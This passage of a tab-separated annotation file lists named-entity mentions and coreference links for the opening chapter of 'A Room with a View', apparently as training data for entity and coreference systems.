Street\tFAC\tPROP\nMENTION\tT73\t91\t7\t91\t10\tsuch a charming neighbourhood\tFAC\tNOM\nMENTION\tT74\t93\t3\t93\t4\tour house\tFAC\tNOM\nMENTION\tT76\t94\t0\t94\t1\tMr. Beebe\tPER\tPROP\nMENTION\tT77\t95\t23\t95\t24\tThe church\tFAC\tNOM\nMENTION\tT79\t96\t6\t96\t7\tMr. Beebe\tPER\tPROP\nMENTION\tT81\t99\t2\t99\t3\tthe girl\tPER\tNOM\nMENTION\tT82\t99\t7\t99\t7\tFlorence\tGPE\tPROP\nMENTION\tT83\t100\t5\t100\t6\ta newcomer\tPER\tNOM\nMENTION\tT87\t106\t4\t106\t5\tyour ladies\tPER\tNOM\nMENTION\tT88\t107\t1\t107\t2\tThat lady\tPER\tNOM\nMENTION\tT89\t107\t9\t107\t10\tMiss Bartlett\tPER\tPROP\nMENTION\tT90\t107\t12\t107\t13\ther cousin\tPER\tNOM\nMENTION\tT91\t110\t24\t110\t25\tthe beggars\tPER\tNOM\nMENTION\tT92\t110\t38\t110\t39\tthe place\tGPE\tNOM\nMENTION\tT93\t111\t0\t111\t2\tThe Pension Bertolini\tFAC\tPROP\nMENTION\tT94\t112\t5\t112\t6\tkind ladies\tPER\tNOM\nMENTION\tT95\t113\t7\t113\t9\tthe clever lady\tPER\tNOM\nMENTION\tT96\t115\t0\t115\t1\tThat place\tGPE\tNOM\nMENTION\tT97\t117\t0\t117\t4\tThe young man named George\tPER\tNOM\nMENTION\tT98\t117\t4\t117\t4\tGeorge\tPER\tPROP\nMENTION\tT99\t117\t7\t117\t9\tthe clever lady\tPER\tNOM\nMENTION\tT102\t120\t28\t120\t30\tthe two outsiders\tPER\tNOM\nMENTION\tT1\t0\t19\t0\t20\tMiss Bartlett\tPER\tPROP\nMENTION\tT103\t1\t3\t1\t9\tsouth rooms with a view close together\tFAC\tNOM\nMENTION\tT3\t1\t16\t1\t28\tnorth rooms , looking into a courtyard , and a long way apart\tFAC\tNOM\nMENTION\tT104\t4\t1\t4\t1\tLucy\tPER\tPROP\nMENTION\tT6\t5\t4\t5\t4\tLondon\tGPE\tPROP\nMENTION\tT105\t6\t7\t6\t8\tEnglish people\tPER\tNOM\nMENTION\tT7\t6\t32\t6\t34\tthe English people\tPER\tNOM\nMENTION\tT106\t6\t40\t6\t42\tthe late Queen\tPER\tNOM\nMENTION\tT9\t6\t44\t6\t47\tthe late Poet Laureate\tPER\tNOM\nMENTION\tT107\t6\t51\t6\t53\tthe English people\tPER\tNOM\nMENTION\tT108\t6\t66\t6\t68\tRev. Cuthbert Eager\tPER\tPROP\nMENTION\tT109\t8\t1\t8\t1\tCharlotte\tPER\tPROP\nMENTION\tT10\t8\t15\t8\t15\tLondon\tGPE\tPROP\nMENTION\tT110\t12\t6\t12\t7\tthe Arno\tLOC\tPROP\nMENTION\tT111\t13\t13\t13\t14\tthe Arno\tLOC\tPROP\nMENTION\tT15\t17\t0\t17\t0\tLucy\tPER\tPROP\nMENTION\tT112\t18\t1\t18\t1\tCharlotte\tPER\tPROP\nMENTION\tT113\t18\t16\t18\t17\tthe Arno\tLOC\tPROP\nMENTION\tT19\t20\t17\t20\t18\tMiss Bartlett\tPER\tPROP\nMENTION\tT114\t20\t28\t20\t30\tLucy ’s mother\tPER\tNOM\nMENTION\tT115\t24\t7\t24\t7\tLucy\tPER\tPROP\nMENTION\tT116\t28\t0\t28\t3\tSome of their neighbours\tPER\tNOM\nMENTION\tT117\t28\t12\t28\t21\tone of the ill-bred people whom one does meet abroad\tPER\tNOM\nMENTION\tT118\t28\t8\t28\t10\tone of them\tPER\tNOM\nMENTION\tT24\t33\t2\t33\t18\tan old man , of heavy build , with a fair , shaven face and large eyes\tPER\tNOM\nMENTION\tT27\t35\t4\t35\t5\tMiss Bartlett\tPER\tPROP\nMENTION\tT29\t41\t3\t41\t4\tmy son\tPER\tNOM\nMENTION\tT30\t41\t16\t41\t16\tGeorge\tPER\tPROP\nMENTION\tT120\t43\t9\t43\t9\tLucy\tPER\tPROP\nMENTION\tT121\t46\t13\t46\t14\tthe new-comers\tPER\tNOM\nMENTION\tT122\t46\t0\t46\t4\tThe better class of tourist\tPER\tNOM\nMENTION\tT35\t51\t13\t51\t13\tLucy\tPER\tPROP\nMENTION\tT123\t55\t1\t55\t1\tWomen\tPER\tNOM\nMENTION\tT124\t56\t20\t56\t20\tGeorge\tPER\tPROP\nMENTION\tT125\t60\t0\t60\t0\tLucy\tPER\tPROP\nMENTION\tT45\t60\t48\t60\t48\trooms\tFAC\tNOM\nMENTION\tT126\t65\t5\t65\t8\tany one so gross\tPER\tNOM\nMENTION\tT49\t68\t1\t68\t12\ttwo little old ladies , who were sitting further up the table\tPER\tNOM\nMENTION\tT127\t69\t11\t69\t11\tLucy\tPER\tPROP\nMENTION\tT128\t70\t0\t70\t0\tLucy\tPER\tPROP\nMENTION\tT129\t70\t5\t70\t8\tvery odd people opposite\tPER\tNOM\nMENTION\tT130\t71\t5\t71\t5\tdear\tPER\tNOM\nMENTION\tT131\t72\t0\t72\t1\tThis pension\tFAC\tNOM\nMENTION\tT132\t31\t2\t31\t3\ta pension\tFAC\tNOM\nMENTION\tT50\t75\t12\t75\t34\ta clergyman , stout but attractive , who hurried forward to take his place at the table , cheerfully apologizing for his lateness\tPER\tNOM\nMENTION\tT51\t76\t0\t76\t0\tLucy\tPER\tPROP\nMENTION\tT53\t77\t4\t77\t5\tMr. Beebe\tPER\tPROP\nMENTION\tT54\t79\t2\t79\t2\tCharlotte\tPER\tPROP\nMENTION\tT133\t82\t8\t82\t9\tMiss Bartlett\tPER\tPROP\nMENTION\tT58\t82\t11\t82\t12\tMiss Honeychurch\tPER\tPROP\nMENTION\tT134\t82\t17\t82\t18\tTunbridge Wells\tGPE\tPROP\nMENTION\tT135\t82\t25\t82\t27\tSt. Peter ’s\tORG\tNOM\nMENTION\tT136\t82\t22\t82\t27\tthe Vicar of St. Peter ’s\tPER\tNOM\nMENTION\tT60\t83\t0\t83\t11\tThe clergyman , who had the air of one on a holiday\tPER\tNOM\nMENTION\tT137\t84\t16\t84\t16\tLucy\tPER\tPROP\nMENTION\tT138\t85\t11\t85\t21\tthe girl , who was in a state of spiritual starvation\tPER\tNOM\nMENTION\tT139\t87\t0\t87\t1\tSummer Street\tFAC\tPROP\nMENTION\tT140\t88\t5\t88\t9\tthe parish of Summer Street\tFAC\tNOM\nMENTION\tT65\t93\t6\t93\t7\tWindy Corner\tFAC\tPROP\nMENTION\tT75\t95\t3\t95\t3\tmother\tPER\tNOM\nMENTION\tT78\t95\t9\t95\t10\tmy brother\tPER\tNOM\nMENTION\tT141\t96\t1\t96\t1\tLucy\tPER\tPROP\nMENTION\tT142\t98\t5\t98\t5\tLucy\tPER\tPROP\nMENTION\tT80\t98\t15\t98\t16\tMiss Bartlett\tPER\tPROP\nMENTION\tT143\t99\t21\t99\t21\tthere\tGPE\tNOM\nMENTION\tT144\t102\t8\t102\t8\tFiesole\tGPE\tPROP\nMENTION\tT145\t102\t13\t102\t13\tSettignano\tGPE\tPROP\nMENTION\tT85\t105\t1\t105\t2\tMr. Beebe\tPER\tPROP\nMENTION\tT86\t106\t9\t106\t9\tPrato\tGPE\tPROP\nMENTION\tT146\t110\t0\t110\t0\tPeople\tPER\tNOM\nMENTION\tT147\t110\t15\t110\t17\tthe electric trams\tVEH\tNOM\nMENTION\tT148\t113\t14\t113\t14\tPrato\tGPE\tPROP\nMENTION\tT149\t114\t4\t114\t4\tPrato\tGPE\tPROP\nMENTION\tT100\t118\t3\t118\t4\this father\tPER\tNOM\nMENTION\tT101\t119\t0\t119\t0\tLucy\tPER\tPROP\nMENTION\tT150\t0\t5\t0\t6\tThe Bertolini\tFAC\tNOM\nMENTION\tT151\t6\t72\t6\t72\tOxon\tORG\tPROP\nMENTION\tT119\t31\t4\t31\t4\tpeople\tPER\tNOM\nMENTION\tT175\t86\t5\t86\t6\tthe world\tLOC\tNOM\nMENTION\tT176\t120\t7\t120\t8\tany one\tPER\tNOM\nMENTION\tT177\t1\t14\t1\t14\there\tFAC\tNOM\nMENTION\tT179\t1\t0\t1\t0\tShe\tPER\tPRON\nMENTION\tT180\t1\t2\t1\t2\tus\tPER\tPRON\nMENTION\tT181\t6\t0\t6\t0\tShe\tPER\tPRON\nMENTION\tT182\t8\t5\t8\t5\tyou\tPER\tPRON\nMENTION\tT183\t8\t11\t8\t11\twe\tPER\tPRON\nMENTION\tT184\t9\t0\t9\t0\tI\tPER\tPRON\nMENTION\tT185\t10\t0\t10\t0\tI\tPER\tPRON\nMENTION\tT186\t11\t17\t11\t17\ther\tPER\tPRON\nMENTION\tT187\t12\t1\t12\t1\tI\tPER\tPRON\nMENTION\tT188\t13\t5\t13\t5\tus\tPER\tPRON\nMENTION\tT189\t13\t7\t13\t7\ther\tPER\tPRON\nMENTION\tT190\t16\t5\t16\t5\tme\tPER\tPRON\nMENTION\tT191\t16\t19\t16\t19\tyou\tPER\tPRON\nMENTION\tT192\t17\t3\t17\t3\tshe\tPER\tPRON\nMENTION\tT193\t18\t3\t18\t3\tyou\tPER\tPRON\nMENTION\tT194\t18\t7\t18\t7\tme\tPER\tPRON\nMENTION\tT195\t18\t12\t18\t12\tyou\tPER\tPRON\nMENTION\tT196\t19\t0\t19\t0\tI\tPER\tPRON\nMENTION\tT197\t20\t10\t20\t10\tYou\tPER\tPRON\nMENTION\tT198\t20\t38\t20\t38\tshe\tPER\tPRON\nMENTION\tT199\t22\t0\t22\t0\tYou\tPER\tPRON\nMENTION\tT200\t23\t1\t23\t1\tI\tPER\tPRON\nMENTION\tT201\t24\t0\t24\t0\tYour\tPER\tPRON\nMENTION\tT202\t24\t5\t24\t5\tme\tPER\tPRON\nMENTION\tT203\t25\t1\t25\t1\tShe\tPER\tPRON\nMENTION\tT204\t25\t5\t25\t5\tme\tPER\tPRON\nMENTION\tT205\t27\t0\t27\t0\tThey\tPER\tPRON\nMENTION\tT206\t27\t10\t27\t10\tthey\tPER\tPRON\nMENTION\tT207\t28\t2\t28\t2\ttheir\tPER\tPRON\nMENTION\tT208\t28\t10\t28\t10\tthem\tPER\tPRON\nMENTION\tT209\t28\t32\t28\t32\ttheir\tPER\tPRON\nMENTION\tT210\t29\t0\t29\t0\tHe\tPER\tPRON\nMENTION\tT211\t29\t4\t29\t4\tI\tPER\tPRON\nMENTION\tT212\t29\t9\t29\t9\tI\tPER\tPRON\nMENTION\tT213\t31\t6\t31\t6\tthem\tPER\tPRON\nMENTION\tT214\t31\t23\t31\t23\tthey\tPER\tPRON\nMENTION\tT215\t31\t29\t31\t29\tthey\tPER\tPRON\nMENTION\tT216\t32\t0\t32\t0\tShe\tPER\tPRON\nMENTION\tT217\t32\t10\t32\t10\tshe\tPER\tPRON\nMENTION\tT218\t32\t13\t32\t13\thim\tPER\tPRON\nMENTION\tT219\t33\t0\t33\t0\tHe\tPER\tPRON\nMENTION\tT220\t35\t13\t35\t13\ther\tPER\tPRON\nMENTION\tT221\t35\t18\t35\t18\this\tPER\tPRON\nMENTION\tT222\t36\t4\t36\t4\ther\tPER\tPRON\nMENTION\tT223\t37\t0\t37\t0\tHe\tPER\tPRON\nMENTION\tT224\t37\t8\t37\t8\tthem\tPER\tPRON\nMENTION\tT225\t37\t10\t37\t10\tthey\tPER\tPRON\nMENTION\tT226\t38\t1\t38\t1\tshe\tPER\tPRON\nMENTION\tT227\t38\t7\t38\t7\the\tPER\tPRON\nMENTION\tT228\t38\t10\t38\t10\ther\tPER\tPRON\nMENTION\tT229\t41\t3\t41\t3\tmy\tPER\tPRON\nMENTION\tT230\t41\t13\t41\t13\this\tPER\tPRON\nMENTION\tT231\t42\t0\t42\t0\tHe\tPER\tPRON\nMENTION\tT232\t44\t2\t44\t2\tI\tPER\tPRON\nMENTION\tT233\t44\t6\t44\t6\the\tPER\tPRON\nMENTION\tT234\t44\t12\t44\t12\tyou\tPER\tPRON\nMENTION\tT235\t44\t15\t44\t15\tour\tPER\tPRON\nMENTION\tT236\t44\t19\t44\t19\twe\tPER\tPRON\nMENTION\tT237\t45\t0\t45\t0\tWe\tPER\tPRON\nMENTION\tT238\t47\t7\t47\t7\ther\tPER\tPRON\nMENTION\tT239\t47\t18\t47\t18\tyou\tPER\tPRON\nMENTION\tT240\t50\t11\t50\t11\tyou\tPER\tPRON\nMENTION\tT241\t51\t1\t51\t1\tYou\tPER\tPRON\nMENTION\tT242\t51\t4\t51\t4\twe\tPER\tPRON\nMENTION\tT243\t52\t0\t52\t0\tHer\tPER\tPRON\nMENTION\tT244\t52\t4\t52\t4\ther\tPER\tPRON\nMENTION\tT245\t54\t0\t54\t0\the\tPER\tPRON\nMENTION\tT246\t56\t1\t56\t1\the\tPER\tPRON\nMENTION\tT247\t56\t4\t56\t4\this\tPER\tPRON\nMENTION\tT248\t56\t14\t56\t14\this\tPER\tPRON\nMENTION\tT249\t56\t23\t56\t23\tthem\tPER\tPRON\nMENTION\tT250\t57\t5\t57\t5\tthey\tPER\tPRON\nMENTION\tT251\t59\t0\t59\t0\tHe\tPER\tPRON\nMENTION\tT252\t59\t8\t59\t8\the\tPER\tPRON\nMENTION\tT253\t59\t12\t59\t12\this\tPER\tPRON\nMENTION\tT254\t60\t8\t60\t8\tshe\tPER\tPRON\nMENTION\tT255\t60\t11\t60\t11\tthey\tPER\tPRON\nMENTION\tT256\t60\t26\t60\t26\tshe\tPER\tPRON\nMENTION\tT257\t60\t64\t60\t64\tshe\tPER\tPRON\nMENTION\tT258\t61\t12\t61\t12\tshe\tPER\tPRON\nMENTION\tT259\t62\t4\t62\t4\tshe\tPER\tPRON\nMENTION\tT260\t63\t0\t63\t0\tThey\tPER\tPRON\nMENTION\tT261\t66\t0\t66\t0\tHer\tPER\tPRON\nMENTION\tT262\t67\t0\t67\t0\tShe\tPER\tPRON\nMENTION\tT263\t67\t11\t67\t11\tyou\tPER\tPRON\nMENTION\tT264\t68\t30\t68\t30\tWe\tPER\tPRON\nMENTION\tT265\t68\t34\t68\t34\twe\tPER\tPRON\nMENTION\tT266\t69\t2\t69\t2\tyour\tPER\tPRON\nMENTION\tT267\t69\t8\t69\t8\tshe\tPER\tPRON\nMENTION\tT268\t69\t22\t69\t22\tshe\tPER\tPRON\nMENTION\tT269\t71\t2\t71\t2\tyour\tPER\tPRON\nMENTION\tT270\t73\t1\t73\t1\twe\tPER\tPRON\nMENTION\tT271\t74\t2\t74\t2\tshe\tPER\tPRON\nMENTION\tT272\t74\t8\t74\t8\tshe\tPER\tPRON\nMENTION\tT273\t75\t24\t75\t24\this\tPER\tPRON\nMENTION\tT274\t75\t33\t75\t33\this\tPER\tPRON\nMENTION\tT275\t76\t13\t76\t13\ther\tPER\tPRON\nMENTION\tT276\t79\t4\t79\t4\twe\tPER\tPRON\nMENTION\tT277\t81\t11\t81\t11\tyou\tPER\tPRON\nMENTION\tT278\t82\t0\t82\t0\tI\tPER\tPRON\nMENTION\tT279\t82\t3\t82\t3\tyou\tPER\tPRON\nMENTION\tT280\t82\t6\t82\t6\tus\tPER\tPRON\nMENTION\tT281\t82\t20\t82\t20\tyou\tPER\tPRON\nMENTION\tT282\t83\t22\t83\t22\tthey\tPER\tPRON\nMENTION\tT283\t83\t24\t83\t24\thim\tPER\tPRON\nMENTION\tT284\t84\t1\t84\t1\the\tPER\tPRON\nMENTION\tT285\t84\t12\t84\t12\the\tPER\tPRON\nMENTION\tT286\t85\t1\t85\t1\tI\tPER\tPRON\nMENTION\tT287\t85\t7\t85\t7\tyou\tPER\tPRON\nMENTION\tT288\t85\t33\t85\t33\ther\tPER\tPRON\nMENTION\tT289\t88\t23\t88\t23\tshe\tPER\tPRON\nMENTION\tT290\t88\t27\t88\t27\tme\tPER\tPRON\nMENTION\tT291\t88\t34\t88\t34\tyou\tPER\tPRON\nMENTION\tT292\t88\t45\t88\t45\tI\tPER\tPRON\nMENTION\tT293\t89\t0\t89\t0\tShe\tPER\tPRON\nMENTION\tT294\t89\t5\t89\t5\tI\tPER\tPRON\nMENTION\tT295\t89\t7\t89\t7\tyou\tPER\tPRON\nMENTION\tT296\t89\t13\t89\t13\tI\tPER\tPRON\nMENTION\tT297\t89\t20\t89\t20\tI\tPER\tPRON\nMENTION\tT298\t90\t1\t90\t1\tI\tPER\tPRON\nMENTION\tT299\t91\t0\t91\t0\tI\tPER\tPRON\nMENTION\tT300\t92\t5\t92\t5\tI\tPER\tPRON\nMENTION\tT301\t93\t3\t93\t3\tour\tPER\tPRON\nMENTION\tT302\t95\t5\t95\t5\tme\tPER\tPRON\nMENTION\tT303\t95\t9\t95\t9\tmy\tPER\tPRON\nMENTION\tT304\t95\t17\t95\t17\twe\tPER\tPRON\nMENTION\tT305\t95\t19\t95\t19\thim\tPER\tPRON\nMENTION\tT306\t95\t30\t95\t30\tI\tPER\tPRON\nMENTION\tT307\t96\t9\t96\t9\this\tPER\tPRON\nMENTION\tT308\t97\t1\t97\t1\tI\tPER\tPRON\nMENTION\tT309\t97\t7\t97\t7\tyou\tPER\tPRON\nMENTION\tT310\t98\t0\t98\t0\tHe\tPER\tPRON\nMENTION\tT311\t98\t9\t98\t9\the\tPER\tPRON\nMENTION\tT312\t98\t21\t98\t21\this\tPER\tPRON\nMENTION\tT313\t99\t0\t99\t0\tHe\tPER\tPRON\nMENTION\tT314\t99\t5\t99\t5\tshe\tPER\tPRON\nMENTION\tT315\t99\t17\t99\t17\tshe\tPER\tPRON\nMENTION\tT316\t100\t9\t100\t9\the\tPER\tPRON\nMENTION\tT317\t101\t9\t101\t9\this\tPER\tPRON\nMENTION\tT318\t105\t4\t105\t4\tyou\tPER\tPRON\nMENTION\tT319\t106\t4\t106\t4\tyour\tPER\tPRON\nMENTION\tT320\t107\t12\t107\t12\ther\tPER\tPRON\nMENTION\tT321\t108\t1\t108\t1\tWe\tPER\tPRON\nMENTION\tT322\t109\t11\t109\t11\tthem\tPER\tPRON\nMENTION\tT323\t110\t2\t110\t2\tthem\tPER\tPRON\nMENTION\tT324\t110\t43\t110\t43\tthem\tPER\tPRON\nMENTION\tT325\t111\t10\t111\t10\tthey\tPER\tPRON\nMENTION\tT326\t112\t2\t112\t2\tthey\tPER\tPRON\nMENTION\tT327\t112\t11\t112\t11\tthem\tPER\tPRON\nMENTION\tT328\t114\t0\t114\t0\tThey\tPER\tPRON\nMENTION\tT329\t116\t0\t116\t0\tI\tPER\tPRON\nMENTION\tT330\t116\t4\t116\t4\tI\tPER\tPRON\nMENTION\tT331\t116\t15\t116\t15\tyou\tPER\tPRON\nMENTION\tT332\t117\t16\t117\t16\this\tPER\tPRON\nMENTION\tT333\t118\t1\t118\t1\the\tPER\tPRON\nMENTION\tT334\t118\t3\t118\t3\this\tPER\tPRON\nMENTION\tT335\t119\t6\t119\t6\ther\tPER\tPRON\nMENTION\tT336\t119\t13\t119\t13\tthey\tPER\tPRON\nMENTION\tT337\t120\t2\t120\t2\ther\tPER\tPRON\nMENTION\tT338\t120\t18\t120\t18\tshe\tPER\tPRON\nMENTION\tT339\t120\t23\t120\t23\tshe\tPER\tPRON\nMENTION\tT340\t2\t2\t2\t2\tLucy\tPER\tPROP\nMENTION\tT341\t69\t5\t69\t5\tdear\tPER\tNOM\nCOREF\tT150\tThe_Bertolini-0\nCOREF\tT0\tThe_Signora-1\nCOREF\tT1\tCharlotte_Bartlett-2\nCOREF\tT179\tThe_Signora-1\nCOREF\tT180\tCharlotte_and_Lucy-3\nCOREF\tT103\tsouth_rooms_with_a_view_close_together-4\nCOREF\tT177\tnorth_rooms-5\nCOREF\tT3\tnorth_rooms-5\nCOREF\tT2\ta_courtyard-6\nCOREF\tT340\tLucy-7\nCOREF\tT4\ta_Cockney-8\nCOREF\tT104\tLucy-7\nCOREF\tT5\tThe_Signora-1\nCOREF\tT6\tLondon-9\nCOREF\tT181\tLucy-7\nCOREF\tT105\tEnglish_people-10\nCOREF\tT7\tEnglish_people-10\nCOREF\tT106\tthe_late_Queen-11\nCOREF\tT9\tthe_late_Poet_Laureate-12\nCOREF\tT107\tEnglish_people-10\nCOREF\tT8\tthe_English_church-13\nCOREF\tT108\tRev__Cuthbert_Eager-14\nCOREF\tT151\tOxon-15\nCOREF\tT109\tCharlotte_Bartlett-2\nCOREF\tT182\tCharlotte_Bartlett-2\nCOREF\tT183\tCharlotte_and_Lucy-3\nCOREF\tT10\tLondon-9\nCOREF\tT184\tLucy-7\nCOREF\tT185\tLucy-7\nCOREF\tT11\tCharlotte_Bartlett-2\nCOREF\tT186\tCharlotte_Bartlett-2\nCOREF\tT187\tCharlotte_Bartlett-2\nCOREF\tT110\tthe_Arno-16\nCOREF\tT12\tsouth_rooms_with_a_view_close_together-4\nCOREF\tT13\tThe_Signora-1\nCOREF\tT188\tCharlotte_and_Lucy-3\nCOREF\tT189\tThe_Signora-1\nCOREF\tT111\tthe_Arno-16\nCOREF\tT14\tThe_Signora-1\nCOREF\tT190\tCharlotte_Bartlett-2\nCOREF\tT16\tCharlotte_Bartlett-2\nCOREF\tT191\tLucy-7\nCOREF\tT15\tLucy-7\nCOREF\tT192\tLucy-7\nCOREF\tT112\tCharlotte_Bartlett-2\nCOREF\tT193\tCharlotte_Bartlett-2\nCOREF\tT194\tLucy-7\nCOREF\tT195\tCharlotte_Bartlett-2\nCOREF\tT113\tthe_Arno-16\nCOREF\tT196\tLucy-7\nCOREF\tT18\tThe_first_vacant_room_in_the_front-17\nCOREF\tT17\tthe_front-18\nCOREF\tT197\tLucy-7\nCOREF\tT19\tCharlotte_Bartlett-2\nCOREF\tT20\tLucy-7\nCOREF\tT114\tLucy__s_mother-19\nCOREF\tT198\tCharlotte_Bartlett-2\nCOREF\tT199\tCharlotte_Bartlett-2\nCOREF\tT200\tCharlotte_Bartlett-2\nCOREF\tT21\tLucy__s_mother-19\nCOREF\tT201\tLucy-7\nCOREF\tT202\tCharlotte_Bartlett-2\nCOREF\tT115\tLucy-7\nCOREF\tT203\tLucy__s_mother-19\nCOREF\tT204\tCharlotte_Bartlett-2\nCOREF\tT22\tCharlotte_and_Lucy-3\nCOREF\tT205\tCharlotte_and_Lucy-3\nCOREF\tT206\tCharlotte_and_Lucy-3\nCOREF\tT116\tSome_of_their_neighbours-20\nCOREF\tT23\ttheir_neighbours-21\nCOREF\tT207\tCharlotte_and_Lucy-3\nCOREF\tT118\tone_of_them-22\nCOREF\tT208\tSome_of_their_neighbours-20\nCOREF\tT209\tCharlotte_and_Lucy-3\nCOREF\tT117\tone_of_them-22\nCOREF\tT210\tone_of_them-22\nCOREF\tT211\tone_of_them-22\nCOREF\tT212\tone_of_them-22\nCOREF\tT25\tCharlotte_Bartlett-2\nCOREF\tT132\ta_pension-24\nCOREF\tT119\tpeople-25\nCOREF\tT213\tCharlotte_and_Lucy-3\nCOREF\tT214\tCharlotte_and_Lucy-3\nCOREF\tT215\tCharlotte_and_Lucy-3\nCOREF\tT216\tCharlotte_Bartlett-2\nCOREF\tT26\tone_of_them-22\nCOREF\tT217\tCharlotte_Bartlett-2\nCOREF\tT218\tone_of_them-22\nCOREF\tT219\tone_of_them-22\nCOREF\tT27\tCharlotte_Bartlett-2\nCOREF\tT220\tCharlotte_Bartlett-2\nCOREF\tT221\tone_of_them-22\nCOREF\tT222\tCharlotte_Bartlett-2\nCOREF\tT223\tone_of_them-22\nCOREF\tT224\tCharlotte_and_Lucy-3\nCOREF\tT225\tCharlotte_and_Lucy-3\nCOREF\tT226\tCharlotte_Bartlett-2\nCOREF\tT227\tone_of_them-22\nCOREF\tT228\tCharlotte_Bartlett-2\nCOREF\tT29\tGeorge-26\nCOREF\tT229\tone_of_them-22\nCOREF\tT28\tone_of_them-22\nCOREF\tT230\tGeorge-26\nCOREF\tT30\tGeorge-26\nCOREF\tT231\tGeorge-26\nCOREF\tT31\tCharlotte_Bartlett-2\nCOREF\tT120\tLucy-7\nCOREF\tT232\tone_of_them-22\nCOREF\tT233\tone_of_them-22\nCOREF\tT234\tCharlotte_and_Lucy-3\nCOREF\tT32\tour_rooms-27\nCOREF\tT235\tfather_and_george-28\nCOREF\tT236\tfather_and_george-28\nCOREF\tT237\tfather_and_george-28\nCOREF\tT122\tThe_better_class_of_tourist-29\nCOREF\tT33\ttourist-30\nCOREF\tT121\tCharlotte_and_Lucy-3\nCOREF\tT34\tCharlotte_Bartlett-2\nCOREF\tT238\tCharlotte_Bartlett-2\nCOREF\tT239\tone_of_them-22\nCOREF\tT36\tone_of_them-22\nCOREF\tT240\tone_of_them-22\nCOREF\tT241\tLucy-7\nCOREF\tT242\tCharlotte_and_Lucy-3\nCOREF\tT35\tLucy-7\nCOREF\tT37\tCharlotte_Bartlett-2\nCOREF\tT243\tLucy-7\nCOREF\tT244\tLucy-7\nCOREF\tT245\tone_of_them-22\nCOREF\tT123\tWomen-31\nCOREF\tT38\tmen-32\nCOREF\tT246\tone_of_them-22\nCOREF\tT247\tone_of_them-22\nCOREF\tT40\tone_of_them-22\nCOREF\tT39\tGeorge-26\nCOREF\tT248\tone_of_them-22\nCOREF\tT124\tGeorge-26\nCOREF\tT249\tCharlotte_and_Lucy-3\nCOREF\tT250\tCharlotte_and_Lucy-3\nCOREF\tT41\tour_rooms-27\nCOREF\tT42\tGeorge-26\nCOREF\tT251\tGeorge-26\nCOREF\tT43\tCharlotte_and_Lucy-3\nCOREF\tT252\tGeorge-26\nCOREF\tT253\tGeorge-26\nCOREF\tT125\tLucy-7\nCOREF\tT254\tLucy-7\nCOREF\tT255\tCharlotte_and_Lucy-3\nCOREF\tT256\tLucy-7\nCOREF\tT44\tfather_and_george-28\nCOREF\tT45\trooms-33\nCOREF\tT257\tLucy-7\nCOREF\tT47\tone_of_them-22\nCOREF\tT46\tCharlotte_Bartlett-2\nCOREF\tT258\tCharlotte_Bartlett-2\nCOREF\tT259\tCharlotte_Bartlett-2\nCOREF\tT260\tfather_and_george-28\nCOREF\tT48\tCharlotte_Bartlett-2\nCOREF\tT126\tone_of_them-22\nCOREF\tT261\tCharlotte_Bartlett-2\nCOREF\tT262\tCharlotte_Bartlett-2\nCOREF\tT263\ttheir_neighbours-21\nCOREF\tT49\ttwo_little_old_ladies___who_were_sitting_further_up_the_table-34\nCOREF\tT264\ttwo_little_old_ladies___who_were_sitting_further_up_the_table-34\nCOREF\tT265\ttwo_little_old_ladies___who_were_sitting_further_up_the_table-34\nCOREF\tT266\tCharlotte_Bartlett-2\nCOREF\tT267\tCharlotte_Bartlett-2\nCOREF\tT127\tLucy-7\nCOREF\tT268\tCharlotte_Bartlett-2\nCOREF\tT128\tLucy-7\nCOREF\tT129\tfather_and_george-28\nCOREF\tT269\tLucy-7\nCOREF\tT130\tLucy-7\nCOREF\tT341\tLucy-7\nCOREF\tT131\tPension_Bertolini-35\nCOREF\tT270\tCharlotte_and_Lucy-3\nCOREF\tT271\tCharlotte_Bartlett-2\nCOREF\tT272\tCharlotte_Bartlett-2\nCOREF\tT52\troom_of_argument-36\nCOREF\tT50\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT273\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT274\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT51\tLucy-7\nCOREF\tT275\tLucy-7\nCOREF\tT53\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT54\tCharlotte_Bartlett-2\nCOREF\tT276\tCharlotte_and_Lucy-3\nCOREF\tT55\tnorth_rooms-5\nCOREF\tT56\tCharlotte_Bartlett-2\nCOREF\tT277\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT57\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT278\tCharlotte_Bartlett-2\nCOREF\tT279\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT280\tCharlotte_and_Lucy-3\nCOREF\tT133\tCharlotte_Bartlett-2\nCOREF\tT58\tLucy-7\nCOREF\tT134\tTunbridge_Wells-38\nCOREF\tT281\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT136\tthe_Vicar_of_St__Peter__s-39\nCOREF\tT135\tSt__Peter__s-40\nCOREF\tT60\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT59\tCharlotte_and_Lucy-3\nCOREF\tT282\tCharlotte_and_Lucy-3\nCOREF\tT283\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT284\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT285\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT137\tLucy-7\nCOREF\tT286\tLucy-7\nCOREF\tT287\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT138\tLucy-7\nCOREF\tT62\tthe_waiter-41\nCOREF\tT61\tCharlotte_Bartlett-2\nCOREF\tT288\tLucy-7\nCOREF\tT175\tthe_world-42\nCOREF\t